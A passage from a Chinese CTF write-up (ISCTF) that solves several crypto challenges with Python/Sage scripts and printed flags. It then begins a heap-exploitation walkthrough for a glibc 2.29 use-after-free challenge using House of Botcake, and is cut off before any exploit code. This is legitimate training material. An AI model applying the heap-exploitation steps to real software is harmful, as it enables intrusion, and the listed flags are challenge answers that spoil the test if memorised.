&nbsp;  print(\"=\" * 60)<br> &nbsp;  print(\"flag (hex): \" + flag_bytes.hex())<br>except Exception as e:<br> &nbsp;  print(\"UTF-8 \u89e3\u7801\u5931\u8d25: \" + str(e))<br> &nbsp;  print(\"flag (hex): \" + flag_bytes.hex())<br> &nbsp;  # \u5c1d\u8bd5\u76f4\u63a5\u663e\u793a\u5b57\u8282<br> &nbsp;  print(\"flag (bytes): \" + str(flag_bytes))<\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>============================================================<br>Power Tower \u89e3\u5bc6<br>============================================================<br>t = 6039738711082505929<br>n = 107502945843251244337535082460697583639357473016005252008262865481138355040617<br>c = 114092817888610184061306568177474033648737936326143099257250807529088213565247<br>\u200b<br>\u6b63\u5728\u5206\u89e3 n...<br>n \u7684\u56e0\u5b50\u5206\u89e3: 127 * 841705194007 * 1005672644717572752052474808610481144121914956393489966622615553<br>\u03c6(n) = 106656465954594992227312203077713006587965800635814353306369389060697410445312<br>\u200b<br>\u8ba1\u7b97 2^t mod \u03c6(n)...<br>2^t mod \u03c6(n) = 63628789584090558595465598091196928076720283286383800204368188448772762091520<br>\u200b<br>\u8ba1\u7b97 l = 2^(2^t mod \u03c6(n)) mod n...<br>l = 82062069866179877089267477826918688212074322751651681520625309711026709241410<br>\u200b<br>\u89e3\u5bc6 flag...<br>flag (\u6574\u6570) = 33165950942018378556776034296645277066869513684055746490680244406481376584061<br>\u200b<br>\u8f6c\u6362\u4e3a\u5b57\u8282...<br>\u200b<br>============================================================<br>\u89e3\u5bc6\u540e\u7684 flag: ISCTF{Euler_1s_v3ry|useful!!!!!}<br>============================================================<br>flag (hex): 49534354467b45756c65725f31735f763372797c75736566756c21212121217d<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5c0f\u84dd\u9ca8\u7684RSA\u5bc6\u6587<\/h2>\n\n\n\n<p>\u9898\u76ee\u63d0\u4f9b\u4e86\u4e00\u4e2a Python \u811a\u672c <code>task.py<\/code> \u548c\u8f93\u51fa\u6587\u4ef6 <code>output.txt<\/code>\u3002<\/p>\n\n\n\n<p><strong>\u52a0\u5bc6\u903b\u8f91\u5206\u6790<\/strong><\/p>\n\n\n\n<p>\u67e5\u770b <code>task.py<\/code>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>e = 3<br>N = getPrime(512) * getPrime(512)<br>\u200b<br># ... \u7701\u7565\u90e8\u5206\u4ee3\u7801 ...<br>\u200b<br>aes_key = secrets.token_bytes(16)<br>m = bytes_to_long(aes_key)<br>\u200b<br>f = a2 * (m * m) + a1 * m + a0<br>\u200b<br>c = (pow(m, e) + f) % N<\/code><\/pre>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>AES \u5bc6\u94a5<\/strong>: <code>m<\/code> \u662f\u4e00\u4e2a 128 \u4f4d\uff0816\u5b57\u8282\uff09\u7684\u968f\u673a\u6574\u6570\u3002<\/li>\n\n\n\n<li><strong>RSA \u6a21\u6570<\/strong>: <code>N<\/code> \u662f\u4e24\u4e2a 512 \u4f4d\u7d20\u6570\u7684\u4e58\u79ef\uff0c\u957f\u5ea6\u7ea6\u4e3a 1024 \u4f4d\u3002<\/li>\n\n\n\n<li><strong>\u52a0\u5bc6\u65b9\u7a0b<\/strong>:$$<br>c \\equiv m^3 + a_2 m^2 + a_1 m + a_0 \\pmod N<br>$$<\/li>\n<\/ol>\n\n\n\n<p><strong>\u6570\u503c\u5927\u5c0f\u4f30\u7b97<\/strong><\/p>\n\n\n\n<p>\u6211\u4eec\u9700\u8981\u5224\u65ad\u6a21 N \u8fd0\u7b97\u662f\u5426\u5bf9\u7ed3\u679c\u4ea7\u751f\u4e86\u5f71\u54cd\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>m \u662f 128 \u4f4d\u6574\u6570\uff0c\u5373 $$<br>m &lt; 2^{128}<br>$$<br>\u3002<\/li>\n\n\n\n<li>$$<br>m^3 &lt; (2^{128})^3 = 2^{384}<br>$$<br>\u3002<\/li>\n\n\n\n<li><code>output.txt<\/code> \u4e2d\u7ed9\u51fa\u4e86 <code>a2_high = 9012778<\/code> ($$<br>\\approx 2^{23}<br>$$<br>)\uff0c\u4e14 <code>LOW_BITS = 16<\/code>\u3002<\/li>\n\n\n\n<li>$$<br>a_2 \\approx 2^{23} \\cdot 2^{16} = 2^{39}<br>$$<br>\u3002<\/li>\n\n\n\n<li>$$<br>a_2 m^2 \\approx 2^{39} \\cdot 2^{256} = 2^{295}<br>$$<\/li>\n\n\n\n<li>$$<br>a_1, a_0<br>$$<br>\u76f8\u5bf9\u8f83\u5c0f\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u6574\u4e2a\u591a\u9879\u5f0f\u7684\u503c<\/p>\n\n\n\n<p>$$<br>m^3 + a_2 m^2 + a_1 m + a_0<br>$$<\/p>\n\n\n\n<p>\u7684\u91cf\u7ea7\u7ea6\u4e3a<\/p>\n\n\n\n<p>$$<br>2^{384}<br>$$<\/p>\n\n\n\n<p>\u3002 \u800c\u6a21\u6570 N \u7684\u91cf\u7ea7\u7ea6\u4e3a<\/p>\n\n\n\n<p>$$<br>2^{1024}<br>$$<\/p>\n\n\n\n<p>\u3002<\/p>\n\n\n\n<p>\u7531\u4e8e<\/p>\n\n\n\n<p>$$<br>2^{384} \\ll 2^{1024}<br>$$<\/p>\n\n\n\n<p>\uff0c\u6240\u4ee5 <strong>\u6a21 N \u8fd0\u7b97\u6ca1\u6709\u53d1\u751f\u622a\u65ad<\/strong>\u3002\u65b9\u7a0b\u5728\u6574\u6570\u57df\u4e0a\u76f4\u63a5\u6210\u7acb\uff1a<\/p>\n\n\n\n<p>$$<br>m^3 + a_2 m^2 + a_1 m + a_0 &#8211; c = 0<br>$$<\/p>\n\n\n\n<p><strong>\u672a\u77e5\u6570\u5904\u7406<\/strong><\/p>\n\n\n\n<p>\u9898\u76ee\u4e2d $a_2$ \u5e76\u4e0d\u5b8c\u5168\u5df2\u77e5\uff0c\u53ea\u7ed9\u4e86\u9ad8\u4f4d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">a2_high = a2 &gt;&gt; LOW_BITS<\/pre>\n\n\n\n<p>\u8fd9\u610f\u5473\u7740 $a_2$ \u7684\u4f4e 16 \u4f4d\u662f\u672a\u77e5\u7684\u3002\u6211\u4eec\u53ef\u4ee5\u8868\u793a\u4e3a\uff1a<\/p>\n\n\n\n<p>$$<br>a_2 = (a2\\_high \\ll 16) + \\delta<br>$$<\/p>\n\n\n\n<p>\u5176\u4e2d<\/p>\n\n\n\n<p>$$<br>0 \\le \\delta &lt; 2^{16} = 65536<br>$$<\/p>\n\n\n\n<p><strong>\u89e3\u9898\u601d\u8def<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u7206\u7834 <\/strong>$$<br>$\\delta$<br>$$<br>\uff1a\u904d\u5386 $0$ \u5230 $65535$ \u7684\u6240\u6709\u53ef\u80fd\u503c\u3002<\/li>\n\n\n\n<li><strong>\u6784\u9020\u65b9\u7a0b<\/strong>\uff1a\u5bf9\u4e8e\u6bcf\u4e2a $\\delta$\uff0c\u8ba1\u7b97\u51fa\u5b8c\u6574\u7684 $a_2$\uff0c\u5f97\u5230\u786e\u5b9a\u7684\u591a\u9879\u5f0f\u65b9\u7a0b $f(m) = m^3 + a_2 m^2 + a_1 m + a_0 &#8211; c = 0$\u3002<\/li>\n\n\n\n<li><strong>\u6c42\u89e3\u65b9\u7a0b<\/strong>\uff1a\u5728\u5b9e\u6570\u57df\u6216\u6574\u6570\u57df\u6c42\u89e3\u8be5\u4e00\u5143\u4e09\u6b21\u65b9\u7a0b\u3002\u7531\u4e8e $m$ \u662f\u6574\u6570\uff0c\u6211\u4eec\u53ea\u9700\u8981\u5173\u6ce8\u6b63\u6574\u6570\u89e3\u3002\u53ef\u4ee5\u4f7f\u7528\u4e8c\u5206\u67e5\u627e\uff08\u56e0\u4e3a\u51fd\u6570\u5355\u8c03\u9012\u589e\uff09\u6216 SageMath \u7684\u6c42\u6839\u51fd\u6570\u3002<\/li>\n\n\n\n<li><strong>\u9a8c\u8bc1\u89e3<\/strong>\uff1a\u5f97\u5230\u7684 $m$ \u8f6c\u6362\u4e3a\u5b57\u8282\u4e32\u4f5c\u4e3a AES \u5bc6\u94a5\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u5bc6\u6587 <code>ct<\/code>\u3002\u5982\u679c\u89e3\u5bc6\u6210\u529f\uff08Padding \u6b63\u786e\uff09\uff0c\u5219\u5f97\u5230 Flag\u3002<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>from Crypto.Util.number import long_to_bytes<br>from Crypto.Cipher import AES<br>from Crypto.Util.Padding import unpad<br>\u200b<br># \u4ece output.txt \u8bfb\u53d6\u6570\u503c<br>c = 3756824985347508967549776773725045773059311839370527149219720084008312247164501688241698562854942756369420003479117<br>a2_high = 9012778<br>LOW_BITS = 16<br>a1 = 621315<br>a0 = 452775142<br>iv = bytes.fromhex(\"bf38e64bb5c1b069a07b7d1d046a9010\")<br>ct = bytes.fromhex(\"8966006c4724faf53883b56a1a8a08ee17b1535e1657c16b3b129ee2d2e389744c943014eb774cd24a5d0f7ad140276fdec72eb985b6de67b8e4674b0bcdc4a5\")<br>\u200b<br># \u521d\u59cb\u5316\u591a\u9879\u5f0f\u73af<br>R = PolynomialRing(ZZ, 'x')<br>x = R.gen()<br>\u200b<br>print(\"\u5f00\u59cb\u7206\u7834 delta...\")<br>\u200b<br># \u7206\u7834 a2 \u7684\u4f4e 16 \u4f4d<br>for delta in range(1 &lt;&lt; LOW_BITS):<br> &nbsp; &nbsp;# \u6784\u9020\u5b8c\u6574\u7684 a2<br> &nbsp; &nbsp;a2 = (a2_high &lt;&lt; LOW_BITS) + delta<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u6784\u9020\u65b9\u7a0b: x^3 + a2*x^2 + a1*x + a0 - c = 0<br> &nbsp; &nbsp;f = x**3 + a2*x**2 + a1*x + a0 - c<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u5728\u6574\u6570\u73af\u4e0a\u6c42\u6839<br> &nbsp; &nbsp;roots = f.roots()<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;for r, mult in roots:<br> &nbsp; &nbsp; &nbsp; &nbsp;if r &gt; 0:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;m = Integer(r)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"\u627e\u5230\u53ef\u80fd\u7684 m (delta={delta}): {m}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u5c1d\u8bd5 AES \u89e3\u5bc6<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;aes_key = long_to_bytes(m).rjust(16, b'\\0')<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;cipher = AES.new(aes_key, AES.MODE_CBC, iv=iv)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;decrypted = cipher.decrypt(ct)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;flag = unpad(decrypted, 16)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"Flag: {flag.decode()}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;exit(0)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;except Exception as e:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# Padding \u9519\u8bef\u8bf4\u660e\u5bc6\u94a5\u4e0d\u5bf9<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<\/code><\/pre>\n\n\n\n<p><strong>\u8fd0\u884c\u7ed3\u679c<\/strong><\/p>\n\n\n\n<p>\u8fd0\u884c\u811a\u672c\u540e\uff0c\u5728 <code>delta = 10219<\/code> \u65f6\u627e\u5230\u6b63\u786e\u7684 $m$\uff0c\u89e3\u5bc6\u5f97\u5230 Flag\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Found m for delta=10219: &#91;AES Key Integer]<br>Flag: ISCTF{i7_533M5_Lik3_You_R34lLy_UNd3R574nd_Polinomials_4nD_RSA}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">baby_equation<\/h2>\n\n\n\n<p>\u9898\u76ee\u63d0\u4f9b\u4e86\u4e00\u4e2a Python \u811a\u672c <code>baby_equation.py<\/code>\uff0c\u5176\u4e2d\u7ed9\u51fa\u4e86\u4e09\u4e2a\u5173\u4e8e\u672a\u77e5\u6570<\/p>\n\n\n\n<p>$$<br>a, b, c<br>$$<\/p>\n\n\n\n<p>\u7684\u65b9\u7a0b\u4ee5\u53ca\u5bf9\u5e94\u7684\u5e38\u6570<\/p>\n\n\n\n<p>$$<br>K_1, K_2, K_3<br>$$<\/p>\n\n\n\n<p>\u3002\u5176\u4e2d c \u662f flag \u8f6c\u6362\u6210\u7684\u6574\u6570\u3002<\/p>\n\n\n\n<p>\u65b9\u7a0b\u7ec4\u5982\u4e0b\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>$$<br>4b^6 &#8211; 2a^3 + 3ac = K_1<br>$$<\/li>\n\n\n\n<li>$$<br>b^5 + 6c^3 + 2abc = K_2<br>$$<\/li>\n\n\n\n<li>$$<br>3a^3 &#8211; 3ac &#8211; 3b^6 = K_3<br>$$<\/li>\n<\/ol>\n\n\n\n<p><strong>1. \u89c2\u5bdf\u65b9\u7a0b\u7ed3\u6784<\/strong><\/p>\n\n\n\n<p>\u89c2\u5bdf\u65b9\u7a0b (1) \u548c (3)\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0\u5404\u9879\u7684\u5e42\u6b21\u8f83\u9ad8\uff0c\u7279\u522b\u662f $b^6$\u3002\u5982\u679c\u6211\u4eec\u5c1d\u8bd5\u5c06\u8fd9\u4e24\u4e2a\u65b9\u7a0b\u76f8\u52a0\uff0c\u4f1a\u6d88\u53bb $ac$ \u9879\uff0c\u5e76\u5408\u5e76 $a^3$ \u548c<\/p>\n\n\n\n<p>$$<br>b^6<br>$$<\/p>\n\n\n\n<p>\u9879\u3002<\/p>\n\n\n\n<p>$$<br>\\begin{aligned} K_1 + K_3 &amp;= (4b^6 &#8211; 2a^3 + 3ac) + (3a^3 &#8211; 3ac &#8211; 3b^6) \\\\ &amp;= (4b^6 &#8211; 3b^6) + (3a^3 &#8211; 2a^3) + (3ac &#8211; 3ac) \\\\ &amp;= b^6 + a^3 \\end{aligned}<br>$$<\/p>\n\n\n\n<p>\u4ee4<\/p>\n\n\n\n<p>$$<br>S = K_1 + K_3<br>$$<\/p>\n\n\n\n<p>\uff0c\u5219\u6709\uff1a<\/p>\n\n\n\n<p>$$<br>S = a^3 + b^6 \\quad \\dots(4)<br>$$<\/p>\n\n\n\n<p><strong>2. \u8fdb\u4e00\u6b65\u6d88\u5143\u4e0e\u4f30\u7b97<\/strong><\/p>\n\n\n\n<p>\u56de\u5230\u65b9\u7a0b (1)\uff1a<\/p>\n\n\n\n<p>$$<br>K_1 = 4b^6 &#8211; 2a^3 + 3ac<br>$$<\/p>\n\n\n\n<p>\u3002 \u6211\u4eec\u53ef\u4ee5\u5229\u7528 (4) \u5f0f\u5c06<\/p>\n\n\n\n<p>$$<br>a^3<br>$$<\/p>\n\n\n\n<p>\u66ff\u6362\u6389\uff0c\u6216\u8005\u5c1d\u8bd5\u4f30\u7b97 b \u7684\u5927\u5c0f\u3002<\/p>\n\n\n\n<p>\u7531 (4) \u5f0f\u5f97<\/p>\n\n\n\n<p>$$<br>a^3 = S &#8211; b^6<br>$$<\/p>\n\n\n\n<p>\uff0c\u4ee3\u5165 (1) \u5f0f\uff1a<\/p>\n\n\n\n<p>$$<br>\\begin{aligned} K_1 &amp;= 4b^6 &#8211; 2(S &#8211; b^6) + 3ac \\\\ K_1 &amp;= 4b^6 &#8211; 2S + 2b^6 + 3ac \\\\ K_1 + 2S &amp;= 6b^6 + 3ac \\end{aligned}<br>$$<\/p>\n\n\n\n<p>\u6ce8\u610f\u5230 b^6 \u662f\u4e00\u4e2a\u516d\u6b21\u5e42\u9879\uff0cac \u662f\u4e8c\u6b21\u9879\uff08\u5047\u8bbe a, b, c \u7684\u6570\u91cf\u7ea7\u76f8\u5dee\u4e0d\u662f\u7279\u522b\u5de8\u5927\uff09\u3002\u5728\u6570\u503c\u6781\u5927\u65f6\uff0c6b^6 \u7684\u503c\u5c06\u8fdc\u8fdc\u5927\u4e8e 3ac\u3002 \u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u8fd1\u4f3c\u8ba4\u4e3a\uff1a<\/p>\n\n\n\n<p>$$<br>6b^6 \\approx K_1 + 2S<br>$$<\/p>\n\n\n\n<p>$$<br>b \\approx \\sqrt[6]{\\frac{K_1 + 2S}{6}}<br>$$<\/p>\n\n\n\n<p><strong>3. \u6c42\u89e3\u6b65\u9aa4<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u8ba1\u7b97 S = K_1 + K_3\u3002<\/li>\n\n\n\n<li>\u4f30\u7b97 $$<br>b_{approx} = \\lfloor \\sqrt[6]{(K_1 + 2S)\/6} \\rfloor<br>$$<br>\u3002<\/li>\n\n\n\n<li>\u5728\u4f30\u7b97\u503c $$<br>b_{approx}<br>$$<br>\u9644\u8fd1\u5c0f\u8303\u56f4\u7206\u7834 b\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e8e\u6bcf\u4e00\u4e2a\u5047\u8bbe\u7684 b\uff0c\u8ba1\u7b97 $$<br>a^3 = S &#8211; b^6<br>$$<br>\u3002\u9a8c\u8bc1 $S &#8211; b^6$ \u662f\u5426\u4e3a\u5b8c\u5168\u7acb\u65b9\u6570\uff0c\u5982\u679c\u662f\uff0c\u5219\u6c42\u51fa a\u3002<\/li>\n\n\n\n<li>\u6709\u4e86 a \u548c b \u540e\uff0c\u5229\u7528\u65b9\u7a0b (1) $$<br>3ac = K_1 &#8211; 4b^6 + 2a^3<br>$$<br>\u6c42\u51fa c\uff1a$$<br>c = \\frac{K_1 &#8211; 4b^6 + 2a^3}{3a}<br>$$<\/li>\n\n\n\n<li>\u5c06 $c$ \u8f6c\u6362\u4e3a\u5b57\u8282\u4e32\u5373\u5f97\u5230 flag\u3002<\/li>\n<\/ol>\n\n\n\n<p>\u5b8c\u6574\u89e3\u5bc6\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from Crypto.Util.number import long_to_bytes<br>\u200b<br>def integer_root(n, k):<br> &nbsp; &nbsp;\"\"\"\u8ba1\u7b97 n \u7684 k \u6b21\u65b9\u6839\u7684\u6574\u6570\u90e8\u5206\"\"\"<br> &nbsp; &nbsp;if n &lt; 0:<br> &nbsp; &nbsp; &nbsp; &nbsp;if k % 2 == 0: return None<br> &nbsp; &nbsp; &nbsp; &nbsp;return -integer_root(-n, k)<br> &nbsp; &nbsp;if n == 0: return 0<br> &nbsp; &nbsp;u, s = n, n + 1<br> &nbsp; &nbsp;while u &lt; s:<br> &nbsp; &nbsp; &nbsp; &nbsp;s = u<br> &nbsp; &nbsp; &nbsp; &nbsp;t = (k - 1) * s + n \/\/ pow(s, k - 1)<br> &nbsp; &nbsp; &nbsp; &nbsp;u = t \/\/ k<br> &nbsp; &nbsp;return s<br>\u200b<br>def check_perfect_cube(n):<br> &nbsp; &nbsp;\"\"\"\u5224\u65ad\u662f\u5426\u4e3a\u5b8c\u5168\u7acb\u65b9\u6570\"\"\"<br> &nbsp; &nbsp;root = integer_root(n, 3)<br> &nbsp; &nbsp;if root * root * root == n:<br> &nbsp; &nbsp; &nbsp; &nbsp;return True, root<br> &nbsp; &nbsp;return False, None<br>\u200b<br>def solve():<br> &nbsp; &nbsp;# \u9898\u76ee\u6570\u636e<br> &nbsp; &nbsp;K1 = 5530346600323339885232820545798418499625132786869393636420197124606005490078041505765918120769293936395609675704197197479866186297686468133906640256390919799453701894382992223127374374212586492263661287287954143417128958298503464448<br> &nbsp; &nbsp;K3 = -5530346600323339885232820545798418499625132786869393636420197035566805062064534503704976756468319888650441668826363984844327206056424439752726283862026042410921197396370839233560708886006884569969932749615838070243922866371345910111<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 1. \u8ba1\u7b97 S = a^3 + b^6<br> &nbsp; &nbsp;S = K1 + K3<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 2. \u4f30\u7b97 b<br> &nbsp; &nbsp;# 6b^6 \u2248 K1 + 2S<br> &nbsp; &nbsp;val = K1 + 2*S<br> &nbsp; &nbsp;b_approx = integer_root(val \/\/ 6, 6)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;print(f\"Searching for b around {b_approx}...\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 3. \u7206\u7834 b \u5e76\u6c42\u89e3 a, c<br> &nbsp; &nbsp;for delta in range(-100, 100):<br> &nbsp; &nbsp; &nbsp; &nbsp;b = b_approx + delta<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u68c0\u67e5 S - b^6 \u662f\u5426\u4e3a a^3<br> &nbsp; &nbsp; &nbsp; &nbsp;diff = S - b**6<br> &nbsp; &nbsp; &nbsp; &nbsp;is_cube, a = check_perfect_cube(diff)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;if is_cube:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"Found a: {a}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"Found b: {b}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u4ee3\u56de\u65b9\u7a0b1\u6c42\u89e3 c<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# 3ac = K1 - 4b^6 + 2a^3<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;numerator = K1 - 4 * (b**6) + 2 * (a**3)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;denominator = 3 * a<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if denominator != 0 and numerator % denominator == 0:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;c = numerator \/\/ denominator<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;flag = long_to_bytes(c)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(f\"Flag: {flag.decode()}\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;except:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<br>\u200b<br>if __name__ == \"__main__\":<br> &nbsp; &nbsp;solve()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u811a\u672c\u5f97\u5230 flag\uff1a <code>ISCTF{y0u_93t_7h3_3qu4710n_50lv3}<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">tcache<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u67b6\u6784<\/strong>: AMD64<\/li>\n\n\n\n<li><strong>\u4fdd\u62a4<\/strong>:\n<ul class=\"wp-block-list\">\n<li>Full RELRO<\/li>\n\n\n\n<li>Canary found<\/li>\n\n\n\n<li>NX enabled<\/li>\n\n\n\n<li>PIE enabled<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Libc \u7248\u672c<\/strong>: Glibc 2.29<\/li>\n\n\n\n<li><strong>\u6f0f\u6d1e\u70b9<\/strong>:\n<ul class=\"wp-block-list\">\n<li><strong>UAF (Use-After-Free)<\/strong>: <code>delete<\/code> \u51fd\u6570\u91ca\u653e\u5185\u5b58\u540e\u672a\u5c06\u6307\u9488\u7f6e\u7a7a\uff08Dangling Pointer\uff09\uff0c\u4e14 <code>show<\/code> \u51fd\u6570\u672a\u68c0\u67e5 chunk \u662f\u5426\u88ab\u91ca\u653e\uff0c\u4ec5\u68c0\u67e5\u975e\u7a7a\u3002\u8fd9\u5141\u8bb8\u653b\u51fb\u8005\u8bfb\u53d6\u5df2\u91ca\u653e\u5806\u5757\u7684\u5185\u5bb9\uff08\u6cc4\u9732 Libc\uff09\u6216\u518d\u6b21\u64cd\u4f5c\u5df2\u91ca\u653e\u7684\u5806\u5757\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u9650\u5236<\/strong>: \u5168\u5c40\u6570\u7ec4 <code>nodes<\/code> \u5927\u5c0f\u4e3a 22\uff0c\u610f\u5473\u7740\u6211\u4eec\u6700\u591a\u53ea\u80fd\u8fdb\u884c 22 \u6b21 <code>add<\/code> \u64cd\u4f5c\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>House of Botcake<\/strong>\uff1a<\/p>\n\n\n\n<p>Glibc 2.29 \u5f15\u5165\u4e86\u5bf9 Tcache Double Free \u7684\u68c0\u67e5\uff08\u68c0\u67e5 chunk \u7684 <code>key<\/code> \u5b57\u6bb5\u662f\u5426\u7b49\u4e8e <code>tcache<\/code> \u7ed3\u6784\u4f53\u5730\u5740\uff09\u3002\u5982\u679c\u76f4\u63a5\u5bf9\u540c\u4e00\u4e2a chunk \u8fdb\u884c\u4e24\u6b21 <code>free<\/code>\uff0c\u4f1a\u89e6\u53d1 abort\u3002<\/p>\n\n\n\n<p>\u4e3a\u4e86\u7ed5\u8fc7\u8fd9\u4e2a\u68c0\u67e5\u5e76\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u5199\uff0c\u6211\u4eec\u4f7f\u7528 <strong>House of Botcake<\/strong> \u6280\u672f\u3002\u6838\u5fc3\u601d\u60f3\u662f\u5229\u7528 <strong>Unsorted Bin \u7684\u5408\u5e76\u673a\u5236<\/strong> \u6765\u6784\u9020 Tcache Chunk \u548c Unsorted Bin Chunk \u7684 <strong>\u91cd\u53e0<\/strong>\u3002<\/p>\n\n\n\n<p><strong>\u653b\u51fb\u6b65\u9aa4<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u5806\u5e03\u5c40\u51c6\u5907<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u5206\u914d 7 \u4e2a 0x100 \u5927\u5c0f\u7684\u5757\u4f5c\u4e3a <strong>Fillers<\/strong>\uff08\u7528\u4e8e\u4e4b\u540e\u586b\u6ee1 Tcache\uff09\u3002<\/li>\n\n\n\n<li>\u5206\u914d 1 \u4e2a 0x100 \u5927\u5c0f\u7684\u5757 <strong>Prev<\/strong>\u3002<\/li>\n\n\n\n<li>\u5206\u914d 1 \u4e2a 0x100 \u5927\u5c0f\u7684\u5757 <strong>Victim<\/strong>\uff08\u8fd9\u662f\u6211\u4eec\u8981\u91cd\u53e0\u7684\u5757\uff09\u3002<\/li>\n\n\n\n<li>\u5206\u914d 1 \u4e2a 0x100 \u5927\u5c0f\u7684\u5757 <strong>Guard<\/strong>\uff08\u9632\u6b62\u4e0e Top Chunk \u5408\u5e76\uff0c\u5e76\u9884\u7f6e <code>\/bin\/sh<\/code>\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u6cc4\u9732 Libc<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u91ca\u653e 7 \u4e2a Fillers\uff0c\u586b\u6ee1 0x110 \u5927\u5c0f\u7684 Tcache \u94fe\u8868\u3002<\/li>\n\n\n\n<li>\u91ca\u653e <strong>Victim<\/strong>\u3002\u7531\u4e8e Tcache \u5df2\u6ee1\uff0cVictim \u8fdb\u5165 <strong>Unsorted Bin<\/strong>\u3002<\/li>\n\n\n\n<li>\u5229\u7528 UAF\uff0c\u8c03\u7528 <code>show(Victim)<\/code>\u3002\u6b64\u65f6 Victim \u7684 <code>fd<\/code> \u6307\u9488\u6307\u5411 <code>main_arena<\/code> \u9644\u8fd1\u3002\u8bfb\u53d6\u8be5\u6307\u9488\u8ba1\u7b97\u51fa Libc \u57fa\u5740\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u6784\u9020\u91cd\u53e0 (House of Botcake)<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u91ca\u653e <strong>Prev<\/strong>\u3002\u7531\u4e8e Victim \u5df2\u7ecf\u5728 Unsorted Bin \u4e2d\uff08\u4e14\u7269\u7406\u76f8\u90bb\uff09\uff0cPrev \u4f1a\u4e0e Victim \u5408\u5e76\uff0c\u5f62\u6210\u4e00\u4e2a\u5927\u5c0f\u4e3a 0x220 \u7684\u5927 Unsorted Bin 